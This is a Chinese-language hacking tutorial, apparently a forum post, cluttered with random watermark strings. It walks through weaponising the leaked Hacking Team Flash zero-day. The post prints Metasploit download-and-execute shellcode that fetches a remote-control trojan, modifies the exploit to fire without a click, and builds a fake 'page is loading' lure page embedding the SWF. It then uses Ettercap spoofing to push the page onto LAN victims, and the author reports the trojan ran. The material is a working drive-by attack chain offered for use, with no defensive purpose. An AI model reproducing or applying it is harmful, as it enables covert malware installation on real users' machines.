3 q$ @) A" N1 Z
三、flash 0day之手工代码修改制作下载者实例入侵演示
6 {0 v& m# `3 h `7 e1 y; D* D; L( ~
, {* W$ ?. w% l( @' n( M; G$ W) s! `, `( ]7 v! f, _3 x' Z. J1 W
利用到的工具: 5 y# U) G" g7 O0 U* L- a! X, e
8 h2 U o+ I: H5 @4 i. k
8 r8 F- Y( X2 w8 W, K Msf
& C, n2 R/ G* K" K, [3 ~ ) Q) I) h3 p, C4 w s! ~8 F% M% H3 `
. @& M% b& m% M; P6 ]
Ettercap $ L5 A' Q/ h+ r% ?/ Q; d
# ~5 N1 d9 {. \3 _& U
+ }3 {& T: j9 H0 Z! T6 E; H3 R Adobe Flash CS6
]/ D% I" M6 \% u" |1 Z
* K* z- c0 n0 L4 J+ j$ v3 }; E4 o( x( \5 y& [9 K
Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份
" e# C; C$ [/ A % X6 p% h4 N; ` C9 q
' R6 S( |! K5 O1 ]% k
下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_exec,show options
% [* ^, C$ C7 H- U2 d" S y% f . J; J! Q k- U ~7 u" b1 c3 d
0 y8 r: C1 I) x
如图:
& [& o, d- L/ z6 @( @
( Q3 @8 O2 V7 D& x: R/ G. |
' x& _ k/ I$ ~# ~
5 W! v& ]5 f- b) m1 x! t
# i& |6 s C! R) m4 L6 [
0 m# A1 l6 \$ W/ b$ `2 e! n : P% V6 [& n3 s# g$ k. j
; m y% k" \( X* e, G* T+ m. Z- F* o4 [0 M( h; X1 s3 j }
然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图: % m; X7 y+ K$ z! @, r0 n
2 Y( d3 D% u. e3 k9 \$ f ~) h% \) ~3 a7 q6 ^/ d. \
# j0 D# e6 p+ S# e8 B! d
1 r. F5 |/ S s/ V) E9 W; w2 R, j" c8 }+ j/ m/ R7 y8 ?5 a
/ E6 D* p: {& w2 f* R " r! n S7 h, ]. ]- x6 n
3 W) M3 |1 m+ Z1 \) s 然后执行generate -t dword生成shellcode,如下:
5 \7 w; A! B8 A# m, w* u 6 O% L' H7 R& ?: J# z5 ^
8 Q v" e1 [ w0 m0 S c9 l2 s' x
$ L! @# O" q" ]3 {- I
# r4 ], ]0 \, k+ I; Z
2 _7 U# @1 e" T" K% U, w4 `+ z9 {3 O
复制代码到文本下便于我们一会编辑flash exp,如下: ; I" q( {" }! L. Y
; z/ t8 ^* K) L0 A9 u& c
7 r( z9 V* u" P' a 0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31,
0 t% @$ M. m: x, H5 `; w9 j
0 |5 h3 W" s7 p" @* s3 Z( C; X# ~$ O" U
0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0, 8 G, K6 z0 E, j( J
0 W+ {8 v& A/ Q, F* R% K$ T3 [6 N* d! Y9 c! m4 p: T
0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038,
! W$ d+ E* ?4 }
# h8 V& S. W8 ], l6 r$ {) q. d# T( E$ ^0 v# L: F/ f
0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489, + w: g) g$ d) w$ q5 @
3 U+ ~ \- K& E) t3 L0 o' C- d# b) y& o S, B( n% p) ]. p
0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854, F" E G3 u8 ?! H- y' U
1 n8 {6 V3 [5 V6 t# z
* |8 N2 t6 N9 t0 }% y8 ] 0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51, & T$ C5 }! G- f6 @
( Q7 U1 q. f+ o
' v8 {! m2 I3 C' H: o 0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e,
) r Q8 s5 g* }! p1 S. o4 S9 @; h
0 L5 k7 _# ~' A. f# k5 b
* j6 z. a7 t3 t5 k! e 0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757,
! D- v7 w7 U' U! y5 Q
; S/ T/ G2 I8 f O* |% i, K: X* ~7 G' H& }
0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff,
4 X* T& y9 A9 n3 @9 `0 @
* U6 I) k( X- Q( h
. w" U( a$ t1 a1 i 0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6, 5 Z* z* b1 ^1 @& {. f9 `
; g. c3 h: m7 F# X' a+ Y Y
/ _7 \! a& y/ k+ g p) i' g 0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5, - W& l: g# ]# u; L- l9 @
& i0 ~% i& M9 r8 N
3 N. [8 l1 E# ^8 ?3 ^' E 0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853, + T, C! f& s3 {, c
6 g' j& f1 w8 `7 Y% G8 t# T. N& A
0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973,
; v% C) B7 Y2 }$ V
, t2 ^- d9 w v2 t1 B) w. L4 b. N* ?1 y1 T# h& o- ]# {
0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000 , ~, N* L# v4 a( w8 V1 C- ?
6 Z/ |' w: j6 I- e0 F" `1 S( X, k! M: k5 F2 w
1 o/ V0 }0 x& G/ J% G% D6 q
; z0 q V! M+ u. J( X6 Y+ Z9 b* o5 k
7 y V( k4 ^4 c R ( D- b) e* H* o6 y9 t0 Q
6 o$ M. j i2 V8 D4 A2 N! j/ r
0 n( d! ?8 c$ N2 M5 Z
下面我们来修改flash 0day exp,需要修改三个文件,分别为: . ?7 U3 S: d* ]; A7 r5 e2 s% \! v% C y
$ E: [, G- l7 s5 C( u& X: N5 S+ A' S, |& W) M# X8 d
/ G8 _' a/ s) |* ^1 j
( Z, @6 L V0 m( |4 I' j
, W! o' k3 b' V5 H3 ] 先修改ShellWin32.as,部分源代码如图:
- A( @1 f2 J; t7 o" f0 ^, c " Q0 `$ T5 E2 `4 h* U% P
+ t1 S- f5 q! n& m% I! D
+ b4 x+ @: O! Y, ^7 o! Q# g ' @* v' Q9 W0 l4 @2 G9 M
. \$ |1 E6 o/ g. {$ A 我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下:
) K/ c8 f5 W+ ~7 l. n9 ~* K) w, Y
# S( y6 @ m+ V% s, M
) a( v3 \) W x( n# U
/ U, p; g1 L- w7 ^$ B
% y! K1 D% n4 H2 Y& h3 c% |4 J% u1 D% E% L& ?5 q
然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图: * V8 K& e7 L) ]( g/ V
( n1 m+ H) Z+ d! |# N) S
9 e/ C7 N, N9 p7 H: {: p' B
1 Y l7 _% A- B3 k- A
, x1 j, w1 c/ _* S5 k( ^4 U6 o( a/ Y2 [5 l1 U: v
换行在后面加一句TryExpl();注意是l不是数字1,然后如图:
8 V- g/ I" c4 J+ r0 l
8 R" W( ~0 r) V/ Q+ C4 X9 G2 s) j) j* Q
: w4 ]) P! X I/ b6 t, ^2 ^# p
- e0 {& K' D' }+ T
' r7 w% b" @4 s! P
$ w& V; ?5 v* _0 K3 }( ^
- f9 R t _9 ?* [1 `! M1 @6 O& T- w% ?3 ~0 R; a
. R9 c- q4 T1 [* b7 W* Z
' `# s- X2 j. l3 ]" h( J/ V/ c; O! g
然后点保存,下面我们来编译一下,打开
. C- f( s9 F/ y3 s* t+ Y" U : q& \4 b! u% F6 ?; T: |9 }
4 i6 r, O7 [/ A- ]: x: o# [, w exp1.fla然后点文件-发布,看看编译没错误
5 R8 e& z- l! F% r6 N5 I6 O 9 R& O+ g' e1 h
( o3 ?$ Z- v5 |1 L" C Q$ [9 m0 \" m
, ]+ Y# z( ~0 V2 h% w0 w' s" i% u
4 i) J3 Z# d: j: K
. _8 u R2 f# g& L + M! ?2 y) E G* h5 p7 C% J5 _8 W
* i! c0 m+ W1 ^% Y+ m
6 e" g5 p& i+ t8 x + y- F1 l) j6 B" M, S6 z
$ l8 ?+ r2 F+ k/ n+ w
+ t. j% L+ }! B4 X/ R
3 L x7 I0 G8 p A
j! Z1 B( w7 R3 c( J9 t
0 l* d* Y! x5 r7 Z+ A 然后我们把生成的
) ?& p% w0 ?8 }. Y; @
4 L$ B1 f* Q# t5 N' i1 b D$ N$ l
7 @+ B# y5 T6 ~: _ exp1.swf丢到kailinux 的/var/www/html下: ) u, j B' W8 R: R0 n
z# X' l! k3 q/ Z4 i/ Y
) }. M% }! m) F
然后把这段代码好好编辑一下 ) E9 ^4 p0 n; O( g
9 l! [6 d0 [# a8 o7 p- v9 ^ L
! j: s3 p0 ?7 |
, V9 `$ T q) \4 t( n8 C
& w& ^/ N" U `
3 J9 C" M0 i( E O! J! ~
' v! }' @- {# `& d: P6 \4 J/ f
+ k3 } |6 x& B/ a7 o3 v. ?
" V x$ g$ i4 D5 @ : O" C- U |9 \
- A8 y) y. Q0 Y( P. P3 l$ {1 a
% G3 |3 J3 z2 ?" m7 n' \# n3 E7 I
% k4 s9 I! L/ I+ O, M7 Q- _* N5 D: G ! p/ \, i/ g4 v/ v& h2 X: J
( a: p0 P8 L+ P3 ~
# V$ `$ ^5 h& j2 ?7 R
" |- D4 y$ a- D/ E- L+ s c
* m1 ]# m1 f* e0 U' m/ v 0 y8 n" }! h! ]
$ \5 V2 {5 | N; O
; Z1 R: L& N# X) q( r3 `7 ^9 m <!DOCTYPE html> 3 z* r1 ?% s1 `0 z5 G& Q
, Z! F# Q' U, w! i4 k$ t9 l9 x8 \" e# {: [
<html> 4 ?4 A* I( R+ k0 T. F! E+ P
4 ^4 ]( s% y6 T
5 i4 `' r' y$ R( q( o
<head> 0 _, ^5 F! O" e# |
& c! f8 {% h; Q4 A% A
$ l, J0 O4 l3 \ N& [) g
<meta http-equiv="Content-Type" content="text/html;
f1 O; W# B! C0 t9 _0 K
. a$ q) T* \) U" y$ H) _6 \8 ?+ I2 v, G4 B' g- Z# D2 d* t
charset=utf-8"/> % r0 h# U( {- }" v% `( X2 c, o( g
: ^% X9 z! e% \- W3 A; V
7 q, g2 h3 S; @* l5 u n
</head> / q9 J2 I* y( M% H& Y
* k. A1 e9 q; {; m, |
2 @$ C7 y( u& r <body>
7 V$ T$ ^- E2 j! ~
+ e$ u8 \: h! Z+ E# K( R+ F- H: n9 p: Z/ X4 k* A
<h2> Please wait, the requested page is loading...</h2>
$ b& \4 W3 \# _1 X! a3 F - }. [ A* p( B* J
/ o' F) s8 H, d0 A <br> ; a x3 q* |( u R
& L# a& H8 _& o- q! |
& m7 i [2 i" {2 k; R1 O# J$ ^+ B$ i' H <OBJECT + t. q* Z% U9 |+ m6 w- s( d( F
# ~+ g5 W* b1 ?8 ^4 T. G
; J# h# @' ]: S, e- l5 z4 Z classid="clsid27CDB6E-AE6D-11cf-96B8-444553540000" WIDTH="50" HEIGHT="50" id="4"><ARAM NAME=movie
% a+ B" R. q7 S _2 X# G2 C5 }" S3 D
1 Y; P2 D A( @ u' r3 T# b7 I; s- n% m2 s* [$ C" L/ O
VALUE="http://192.168.0.109/exp1.swf"></OBJECT>
3 l7 g6 K7 `: ~- l5 u 3 B: d- X! L- R* ]8 P6 c
5 M1 G3 ?0 ~3 G) i* ], H/ U
</body>
0 o, s; v, e1 s4 a0 w! ?, h
- x' P+ M. \0 c) Z1 z4 }, V7 [9 m; b6 f0 P+ l" Q9 r$ {
<script>
. z! F0 {5 R2 L6 I8 q3 P0 l + t' H, [/ _& ]
2 g' m X) f& k* V setTimeout(function () {
% c/ A6 g& G1 d2 k; _ % G6 E- u2 C X+ [
7 K/ g! d$ V4 w9 S 9 r" D$ U1 B; D7 v3 h
+ J# I' N- f, `0 d& z. r: U0 s+ w/ Y6 l0 E
window.location.reload();
4 [6 o8 `' G4 t3 a$ G : {; R6 L* u* {
1 t, m7 E' [( _7 _ v W }, 10000); & V/ J/ A! m& V# d' [9 s1 H1 o" Z9 H3 e
: T. a B" i4 _& ^1 l4 X# S. j; @
' U% g, D6 J: s* R7 e# Q- j 2 m2 L5 y% x t! T% ]6 \, U
5 T2 @8 @: `( B% e# b! ~4 k1 P( @7 F4 c$ d
</script> 7 g: M* y" ]( g" i
" ^8 G6 J ~3 `
4 O$ l: [3 `7 r6 y </html>
+ g5 o, }7 Z) k- J6 \2 v5 D " i: h- ~9 Q+ i( h
0 s' Q* V4 L/ l- m
2 Y" d9 D3 e2 a; n" k
/ [4 F4 R7 [$ G- R* A+ B% B/ `
. K9 \" \* o4 g6 q. s' J
注意:192.168.0.109是kali的ip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图:
5 w% W0 O2 A& x ) b$ r0 E0 e5 X6 x ^% E
3 {2 R& H; F+ o1 e
4 u3 d' N" H- a# ^& x
7 Y5 N& M' m8 d( }
, X5 t& j, Y" j) k 7 m& K" I( e; B
: [* c+ l3 v. a1 {
& T8 Q9 M1 j$ n/ ~. t* M
; a+ {5 C! X, s- ^2 m' F* ? + x+ C& `; ]: _; f: C. m
: d' W' G$ u3 q& ?# L" p' K M& l' S
+ ^/ g0 M* n: x: T! X ' ?( u4 g# ~) B% O( Y
3 Z8 h9 r; a! ^7 D8 [
8 W0 y/ Q5 l9 t( G 0 m/ j) l W' d0 z7 P& R+ C
+ B, {) B" ?; D1 B( c+ z
下面我们用ettercap欺骗如图:
* w9 G( x9 ^9 j. n1 P) v& e$ h * I( E3 r ^% E5 W$ {; x" N3 ?0 d' \
% p% y3 n% Q: h) D5 p* ?
- j) l6 K/ u1 }4 q3 O
2 T/ C5 u( `- J+ o# i- D s
3 J, s+ @ T7 p+ |0 K
: l. d( S1 j1 }! p$ }
1 s4 N6 N/ _3 D
5 z' t5 j; z3 d+ B' _/ z |
下面我们随便访问个网站看看:
3 o4 g1 I/ n( A) z
' E2 V5 X/ s# I# w+ M, d9 ]& W( N# H: ]
我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图:
5 p. Z8 `. x% I+ J' G5 L; W ( d6 x8 t1 _* f6 q8 m6 X
/ N8 [! }* r: @3 f$ \ - X) W- k7 Y# z& ]2 [
) M$ ?+ t/ f5 u9 m' V/ F. ]: J( G" F( y4 y0 L" x
我们看另一台, " a8 \ u L# c3 U5 z
7 O) M, K+ e* h- [/ b* ?
/ I& g; t2 k+ }& o6 ? 提示这个错误,说明木马是成功被下载执行了,只是由于某些原因没上线而已。。。
$ {9 m# ?4 ]+ B* ]. d8 Q3 \ |